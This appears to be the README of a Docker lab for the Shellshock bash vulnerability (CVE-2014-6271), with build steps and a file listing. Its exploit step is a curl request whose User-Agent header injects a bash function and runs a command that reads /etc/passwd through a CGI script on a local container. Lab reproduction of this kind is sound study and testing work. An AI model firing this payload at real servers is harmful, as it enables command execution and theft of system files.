# docker_CVE-2014-6271.
1. docker build -t DOCKERIMAGENAME /path/to/dockerfile_directory
2. docker run -it -d -p 8080:80 DOCKERIMAGENAME
3. verify execution with: docker ps
4. verify web server execution: http://localhost:8080
5. exploit vulnerability :
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \http://localhost:8080/cgi-bin/vulnerable
[4.0K] /data/pocs/d918b96a395765ccbf41b9977a118c7495e28dc1
├── [ 495] Dockerfile
├── [ 226] index.html
├── [ 49] main.sh
├── [4.0K] packages
│ └── [1.4M] bash_4.2_2Bdfsg-0.1_amd64.deb
├── [ 374] README.md
└── [ 63] vulnerable
1 directory, 6 files